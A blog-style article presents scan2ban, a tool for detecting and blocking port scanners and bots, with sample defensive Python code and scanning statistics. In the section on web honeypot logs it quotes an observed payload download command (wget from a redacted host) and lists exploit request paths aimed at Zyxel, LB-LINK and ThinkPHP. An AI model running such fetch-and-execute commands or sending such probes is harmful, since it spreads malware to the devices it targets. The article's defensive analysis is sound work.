Scan2ban: Protecting Your Perimeter from Scanners and Bots
The days of a “herbivorous” Internet are long gone—when a machine with an exposed network stack on a public IP could survive for years, and only a handful of specialists knew what a CVE was. Statistics show that it takes about two minutes for an anonymous actor to find an open Telnet port, six minutes for Redis, twelve for a web server on port 8080, and twenty for Android Debug Bridge. And the people on the other end aren’t just collecting data for a thesis. To see for yourself, just open SSH and watch as, within half an hour, a whole team of “security specialists” starts hammering your port, generating logs like these:
You don’t have to work in IT security to guess what kind of “research” these folks are doing. And getting rid of their attention is tough. Once they latch on, more and more addresses join in, and soon it feels like the whole Internet is trying to brute-force your machine’s passwords.
By the numbers: in an hour, any IPv4 address (even one that doesn’t respond to anything) gets scanned over 300 times from about 150 sources. Within a week, about 63,000 of its ports will have been probed; within two weeks, 65,000; within a month, every single one. The “small but numerous brotherhood” is definitely watching.
Even if your company’s infrastructure is managed by a team of experienced pros who quickly apply updates, never leave services running “just for five minutes” (that end up staying for years), and don’t upload files for contractors to “secret” ports, there’s still an unavoidable “window of vulnerability.” The exploit is already in the wild while developers are still testing the patch and users are still rolling it out. By the time everyone has finished, attackers with pre-built fingerprint databases will already have struck. Or they’ll just use IoT search engines that sell this information via API for a modest fee. Even a simple scan with ZMap can quickly build a rough target list for follow-up attacks. If you’re not hiding, it’s your problem.
It’s much better if attackers simply don’t know about your external services—at least until they take a direct interest.
Defining the Problem
Protecting your perimeter from scanning can be broken into two parts. First: building a blocklist of addresses with suspicious intentions (or, conversely, addresses you’re sure about). Second: distributing and applying this list across your machines.
Neither task is technically difficult, but a comprehensive solution needs extra logic and a format that’s convenient for storing and analyzing data.
Building such a tool just for yourself isn’t very practical, so when it became clear that a couple of scripts and a unit file wouldn’t cut it, I decided to create a more universal project for anyone interested in the topic. That’s how the scan2ban project was born—it helps me protect my machines from unwanted attention, and maybe it’ll help you too. Below, I’ll show how its different modules work and what you can achieve with them.
Threats and Countermeasures
If you think scanning is simple and there aren’t many variations, you’re mistaken. Over time, I’ve identified several distinct types:
- Scanners: These are straightforward—port sweeps from a single address, either constantly or as a one-off. Easy to detect and block. If you get three packets and none hit an open port, the source goes on the blocklist. At the time of writing, here are the top ten most active sources of this type for the month:
- One-shotters: Less noticeable. They send a request from a random address to a specific port, just once. Blocking by counter is useless—they’ll be back much later, probing a different port. The first request will always get through if you have a service listening. These make up about 80% of incoming requests. Here’s what it looks like over a month:
Blocking these is only possible preemptively. The greyport module handles this, inspired by email greylisting. By default, all ports are closed, and to get access, a source must repeat the request a set number of times (configurable in the module). Usually, this only slows down the first connection. Access is granted for a day, then the process repeats. Requiring one repeat blocks 80% of these requests, two repeats block 90%, and three block 95%. But three is the limit: most client stacks won’t send more than five retries, and legitimate clients may start failing.
Effectiveness also depends on the port number. For ports 80 and 22, the numbers above apply, but for Elasticsearch (9200), just one delayed packet blocks 99 out of 100 requests.
- Periodic Scanners: The calmest type. They probe here and there over time. Here’s what that looks like:
- IoT Search Engines: These send requests from various addresses, often multiple times. They have whole network segments and provider approval, so they can spread out their requests and take their time. The lazyscan module checks how many events have been registered from an address over a long period (default: a week). If it finds systematic activity, it slowly but surely adds the source to the blocklist. Over three months, more than 5,000 such sources were identified, with 50–60 new addresses added daily.
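Two of the rules above, the three-miss counter for plain scanners and the greyport idea for one-shotters, can be modelled in a few lines. This is only a sketch of the logic as described in the text, not scan2ban's actual code: the class names, the per-(source, port) key, and the choice to reset the miss counter when a source hits an open port are all assumptions made for illustration. A real implementation would work on packets at the firewall level rather than on Python method calls.

```python
from collections import defaultdict

DAY = 24 * 60 * 60  # access lifetime in seconds ("access is granted for a day")


class ClosedPortCounter:
    """Scanner rule: block a source after `limit` packets to closed ports."""

    def __init__(self, open_ports, limit=3):
        self.open_ports = set(open_ports)
        self.limit = limit
        self.misses = defaultdict(int)  # src -> consecutive closed-port hits
        self.blocked = set()

    def observe(self, src, port):
        """Record one packet; return True if src is blocked afterwards."""
        if src in self.blocked:
            return True
        if port in self.open_ports:
            # Assumption: touching a real service clears the counter.
            self.misses.pop(src, None)
        else:
            self.misses[src] += 1
            if self.misses[src] >= self.limit:
                self.blocked.add(src)
        return src in self.blocked


class GreyPort:
    """Greylisting for ports: drop the first `repeats` requests from a
    source to a port, then let that source through for `ttl` seconds."""

    def __init__(self, repeats=1, ttl=DAY):
        self.repeats = repeats
        self.ttl = ttl
        self.dropped = defaultdict(int)  # (src, port) -> requests dropped so far
        self.allowed_until = {}          # (src, port) -> expiry timestamp

    def allow(self, src, port, now):
        key = (src, port)
        if self.allowed_until.get(key, 0) > now:
            return True                   # still inside the granted window
        self.allowed_until.pop(key, None)  # window expired or never granted
        if self.dropped[key] >= self.repeats:
            self.dropped[key] = 0
            self.allowed_until[key] = now + self.ttl
            return True
        self.dropped[key] += 1
        return False
```

With `repeats=1`, the first request from a source is dropped, the retry gets through, and a day later the cycle starts again. A one-shotter that never retries never reaches the service at all.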
Owners of “legit” scanners suggest emailing them if you don’t like their activity. In theory, after you prove you own the range you want excluded, they’ll stop bothering you. But this is like blurring out parts of satellite maps: it only draws more attention. And there’s little point, since for every responsible scanner there are five less responsive ones, where filing a complaint is a lottery. So the best tactic is silent blocking, which also saves effort.
The “Honeypot” Effect
Let’s look at what scanners are interested in, protocol-wise—especially HTTP. Web admin panels, REST APIs, and other “conveniences” are not just for service owners, but also for those with “secret knowledge.” A clever request can make someone an admin without any ROP, heap spraying, or other advanced exploits. To monitor this, there’s a module that parses and classifies Nginx requests.
Besides boring Git repo scrapers and requests for /files or /actuator/health, the most popular request at the time of writing was POST /cgi-bin/ViewLog.asp (targeting Zyxel devices). Next is POST /goform/set_LimitClient_cfg (LB-LINK routers), and third is ThinkPHP, with requests like GET /index.php?s=/index/\x09hink... There are countless requests for phpMyAdmin, GeoServer, and other CGI scripts. There are also regular attempts to make you download a file with a “surprise,” like wget http://x.x.x.x/bins/VuVhU33C. If you run this file (don’t!), it’ll display something like “Infected by Cult,” kill your graphical session, start random processes, and begin downloading more malware.
The file is full of lines like p0wned and l33t mixed with idioms, and antivirus software will practically demand you smash your disk with a hammer. Clearly, no one bothers with obfuscation, since Linux malware protection is still rare. But this trend suggests it’s time to start using it (even on routers), unless we want to go back to paid traffic as the only way to force owners to secure their devices.
Sometimes logs reveal interesting things. For example, one user, after a neutral GET / request, unexpectedly filled the logs with their “inner world.” Decoding the Base64 reveals lines like Trojan_C46F6E9 and HacKed_D4990627, a clear hint at their activities. If you’re into analysis, try decoding the last four lines; maybe Batman needs help.
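The request classification mentioned at the start of this section can be sketched roughly as follows. It assumes Nginx's default "combined" access log format and uses the request paths quoted above as rules. The rule labels, the `/.git/` pattern for Git scrapers, and the sample log line are illustrative assumptions, not taken from the project.

```python
import re

# Matches the start of an Nginx "combined" log line:
# addr - user [time] "METHOD path protocol" status ...
LOG_RE = re.compile(
    r'^(?P<addr>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# (label, pattern) pairs, checked in order; the labels are hypothetical.
RULES = [
    ("zyxel", re.compile(r"^/cgi-bin/ViewLog\.asp")),
    ("lb-link", re.compile(r"^/goform/set_LimitClient_cfg")),
    ("thinkphp", re.compile(r"^/index\.php\?s=/index/")),
    ("git-scraper", re.compile(r"^/\.git/")),  # assumed path for Git scrapers
    ("phpmyadmin", re.compile(r"phpmyadmin", re.IGNORECASE)),
]


def classify(line):
    """Return (addr, method, label) for a log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    for label, pattern in RULES:
        if pattern.search(m["path"]):
            return m["addr"], m["method"], label
    return m["addr"], m["method"], "other"


sample = ('203.0.113.7 - - [01/Jan/2024:00:00:01 +0000] '
          '"POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 153 "-" "curl/8.0"')
print(classify(sample))
```

Keeping the rules in an ordered list makes it easy to add a new signature when an unfamiliar request starts showing up in the "other" bucket.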
Responding to Events
The current blocklist is stored in a database (SQLite, but Postgres is better). Constantly polling the DB for new entries isn’t ideal, so there’s a response module. It lets you trigger external scripts when an event occurs—useful for automation, like instantly distributing blocks. You could even hook up a chatbot to send complaints to network operators (and get replies from another bot—very convenient).
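The idea of triggering external scripts on an event can be illustrated with a small dispatcher. This is a sketch under assumptions, not the response module's real interface: the event fields, the choice to pass the event as JSON on standard input, and the function name `run_hooks` are all hypothetical.

```python
import json
import subprocess
import sys


def run_hooks(event, commands, timeout=10):
    """Run each command with the event as JSON on stdin.

    Returns one exit code per command, or None where the command
    could not be started or did not finish within `timeout` seconds.
    """
    payload = json.dumps(event)
    codes = []
    for argv in commands:
        try:
            result = subprocess.run(
                argv, input=payload, text=True,
                capture_output=True, timeout=timeout,
            )
            codes.append(result.returncode)
        except (OSError, subprocess.TimeoutExpired):
            codes.append(None)
    return codes


# Demo hook: a one-line Python script that reads the event and exits 0.
demo_hook = [sys.executable, "-c",
             "import json, sys; json.load(sys.stdin); sys.exit(0)"]
print(run_hooks({"type": "block", "addr": "203.0.113.7"}, [demo_hook]))
```

A hook like this could push the new address to other machines or file a complaint. The timeout keeps one slow script from stalling event processing.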
About “Ping Blockers”
Blocking ICMP (ping) used to be a popular way to reduce interest in your machines. I compared incoming traffic on a test machine that replied to pings with one that didn’t, and found no significant difference. So, these days, such measures are mostly self-deception. Maybe in the 2400/NONE era, “silent” machines saved time for scanners, but now, with no bandwidth issues, blocking these protocols just creates more problems for yourself.
Paranoids may worry that open ICMP increases the attack surface, and that analyzing replies could reveal something interesting. But modern hackers are more likely to send malware via email (sometimes encrypted in an archive, asking the user for a password), so in my view, these precautions are unnecessary.
Who’s Knocking at My Door?
The event database lets you learn more about your “guests.” Here are the results of the “world championship” in unsolicited port scanning for the month (GeoIP integration allows for country-based metrics):
RU leads by a wide margin, but it’s not that simple. I’ll explain why later. Here are the top ten most scanned TCP ports:
The obsession with Telnet suggests a router epidemic; port 6379 (Redis) is in demand for “set-and-forget” servers, and ports 2222, 22322, and 22222 are new—last month, they weren’t even in the sample. Ports 23 and 6379 are most targeted from China, while the “twos” attract attention from the US.
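A "top ports" report like this one boils down to a single aggregate query over the event database. The sketch below uses SQLite from the Python standard library. The `events` table and its columns are a hypothetical schema invented for the example, and the rows are placeholder data, not the article's measurements.

```python
import sqlite3


def top_ports(conn, proto, since, limit=10):
    """Most probed ports for one protocol since a given timestamp.

    Returns rows of (port, total hits, distinct sources).
    """
    cursor = conn.execute(
        "SELECT port, COUNT(*) AS hits, COUNT(DISTINCT src) AS sources "
        "FROM events WHERE proto = ? AND ts >= ? "
        "GROUP BY port ORDER BY hits DESC, port ASC LIMIT ?",
        (proto, since, limit),
    )
    return cursor.fetchall()


# Hypothetical schema and placeholder rows, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE events "
    "(ts INTEGER, src TEXT, proto TEXT, port INTEGER, country TEXT)"
)
conn.executemany("INSERT INTO events VALUES (?, ?, ?, ?, ?)", [
    (100, "203.0.113.7", "tcp", 23, "ZZ"),
    (101, "203.0.113.8", "tcp", 23, "ZZ"),
    (102, "203.0.113.7", "tcp", 6379, "ZZ"),
    (103, "203.0.113.9", "udp", 53, "ZZ"),
])
print(top_ports(conn, "tcp", since=0))
```

Grouping by `country` instead of `port` would give the per-country ranking in the same way.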
About 30% of sources have the same port open as the one they’re scanning (sample for port 6379). For port 23 (Telnet), this drops to 15%. A paradise for security solution salespeople: clients are knocking on your door! If your techs aren’t scared off by CAPTCHAs like these:
UDP is less interesting to attackers, but still racks up a significant number of requests monthly:
Looking at the top three, you might think: “What’s your name? What time is it? Can I call you?” Two-thirds don’t even ask for a name and go straight to “call.”
Which ports are the most “secret”? According to my data, port 58699 is the most secret—only five probes ever. Here’s the top ten:
Running services on non-standard ports, while “hacky,” significantly reduces your chances of being hit in the first wave of attacks after a new vulnerability is discovered. Even if your perimeter isn’t protected by blocklists, no one in their right mind will have bots scan every port—it’s too slow. They’ll focus on the most likely ones. So, something like Citrix Netscaler might survive a bit longer, giving owners time to grab patches from torrents and check for trojans before bots start working off data collected by services like Shodan.
After several months, the blocklist has over 11,000 addresses, with a total database of 154,000. The average increase is about 1,200 entries per day after the “warm-up,” with noticeable waves. Here’s a graph of new address registrations (the initial spike is from the “cold” start):
Here’s the breakdown by national segment, based on “traffic density” (number of requests per source):
The leaders are surprising. On closer inspection, it turns out that zones AZ, NL, EE, and BG have persistent scanners that make regular activity almost invisible. The difference in request density between first place (1,400 packets per address) and HK in sixth (45 packets per address) is roughly 30x.
Among operators of the most “curious” networks (according to Whois), GB (UK) leads, then DE (Germany), and finally AZ (Azerbaijan). Let’s assume British scientists are doing research. There’s even a phone number and contact in Germany, so feel free to call and ask for details.
The “Englishwoman” Scans
Since most of the traffic is targeted information gathering, why not highlight the most active sources? Aggregating addresses by /24 segments gives us 16,519 such sources. To filter out accidental interest, let’s set a threshold based on known entities. For example, The Shadow Server Foundation (a slow scanner) generates no more than 400 requests per month. To be safe, let’s lower the threshold to 100 (so, to make the report, a /24 network must send at least 100 packets in a month). Here’s the result:
We’re in the top three, but don’t rush to grab your balalaika. Looking closer at the subnets in the RU zone, 95% of the traffic comes from just five. According to Whois, the first three are rented by a UK organization, the fourth by Cyprus, and the fifth by Ukraine. So, strictly speaking, we didn’t even make the qualifying round for “boldest scanner.”
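The /24 aggregation with a 100-packet threshold described above takes only a few lines with Python's `ipaddress` module. The function name and the input format (one source address string per packet) are assumptions made for the example. It is written for IPv4 sources.

```python
import ipaddress
from collections import Counter


def busy_networks(packets, threshold=100, prefix=24):
    """Count packets per network and keep networks at or above the threshold.

    `packets` is an iterable of IPv4 source address strings, one per packet.
    """
    counts = Counter()
    for addr in packets:
        # strict=False lets us pass a host address and get its network back.
        net = ipaddress.ip_network(f"{addr}/{prefix}", strict=False)
        counts[str(net)] += 1
    return {net: n for net, n in counts.items() if n >= threshold}


# Placeholder traffic: one /24 reaches the threshold, the other falls short.
packets = (["198.51.100.1"] * 60
           + ["198.51.100.200"] * 40
           + ["203.0.113.5"] * 99)
print(busy_networks(packets))
```

Two hosts in the same /24 are counted together, which is the point: a scanner that rotates addresses inside its own segment still crosses the threshold.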
With a list of anomalous networks, we can subtract them from the total and compare the remaining addresses to the size of the national segment. This gives a rough idea of who’s using their IP space most “efficiently” to keep artificial life going on the Internet:
In Ethiopia, for every 10,000 addresses, three are curious about us. These guys, though, have everything under control:
No surprises, except for South Africa’s presence. But it’s not an anomaly—the number of requests, sources, and segment size are comparable to neighbors.
Back to SSH password brute-forcing. The authentication tracking module can identify botnets, since controllers have to replace blocked elements, gradually revealing their capabilities. Over two months, more than 4,000 addresses were caught doing this:
Failed login attempts usually mean the address is moonlighting as more than just a cat picture server. Grouping RU addresses by operator gives this:
Marketers might want to use this as a new way to estimate hosting and Internet access market shares. Instead of relying on press releases claiming “dozens of industry leaders,” you can build a whole theory based on “natural activity.” Here’s a summary table of the most popular usernames used in login attempts:
The most surprising is the interest in the root account, even though upstream OpenSSH (since version 7.0) and most major Linux distributions disable password login for root by default. But apparently, this basic requirement is often ignored.
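Statistics like these can be pulled straight from the sshd log. The sketch below counts usernames and source addresses in OpenSSH's "Failed password" messages. It illustrates the idea and is not the authentication tracking module itself. The function name and the sample lines are made up for the example.

```python
import re
from collections import Counter

# OpenSSH logs failed password attempts as, for example:
#   Failed password for root from 203.0.113.7 port 51234 ssh2
#   Failed password for invalid user admin from 203.0.113.8 port 40022 ssh2
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<addr>\S+) port \d+"
)


def summarize(lines):
    """Return (usernames, sources) counters for failed password attempts."""
    users, sources = Counter(), Counter()
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            users[m["user"]] += 1
            sources[m["addr"]] += 1
    return users, sources


sample_log = [
    "Jan  1 00:00:01 host sshd[1]: Failed password for root "
    "from 203.0.113.7 port 51234 ssh2",
    "Jan  1 00:00:02 host sshd[2]: Failed password for invalid user admin "
    "from 203.0.113.8 port 40022 ssh2",
    "Jan  1 00:00:03 host sshd[3]: Failed password for root "
    "from 203.0.113.8 port 40023 ssh2",
    "Jan  1 00:00:04 host sshd[4]: Accepted publickey for alice "
    "from 198.51.100.2 port 50000 ssh2",
]
users, sources = summarize(sample_log)
print(users.most_common(10))
```

Feeding the `sources` counter into the blocklist and watching which new addresses take over is what gradually exposes the size of a botnet.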
Looking Ahead
You might wonder how scanners could bypass these measures, and when the whole concept will “turn into a pumpkin.” There aren’t many ways around it. The main concept is resilient: few open ports, many closed ones, so the odds are against the attacker. Just a few mistakes and they’re blocked.
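To put a rough number on "the odds are against the attacker", consider a blind sweep that picks distinct ports uniformly at random and is blocked after three misses. This is a simplifying assumption: real scanners favour popular ports, so the figure describes only random probing of services on non-standard ports. The function name and the example of five open ports are illustrative.

```python
from math import comb


def hit_probability(open_ports, probes=3, total_ports=65535):
    """Chance that at least one of `probes` distinct random ports is open."""
    closed = total_ports - open_ports
    # Probability that every probed port is closed, subtracted from 1.
    return 1 - comb(closed, probes) / comb(total_ports, probes)


# Example: five open ports, blocked after three probes.
print(f"{hit_probability(5):.6f}")
```

For a handful of open ports the result is close to `probes * open_ports / 65535`, a few hundredths of a percent per source address before the block kicks in.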
In the end, you can always rent cheap VPSs in different segments (agents run fine on a single-core machine with 1GB RAM) and block anyone who shows up even once.
The greyport concept has an obvious weakness: to “push through” the block, an attacker just needs to increase the number of requests. But here, the old saying applies: “To outrun a tiger, you don’t have to be the fastest—just not the slowest.”
As long as information gathering is effective, there’s no reason to complicate things. Attackers will only try to bypass when it stops working, and that’s not happening anytime soon.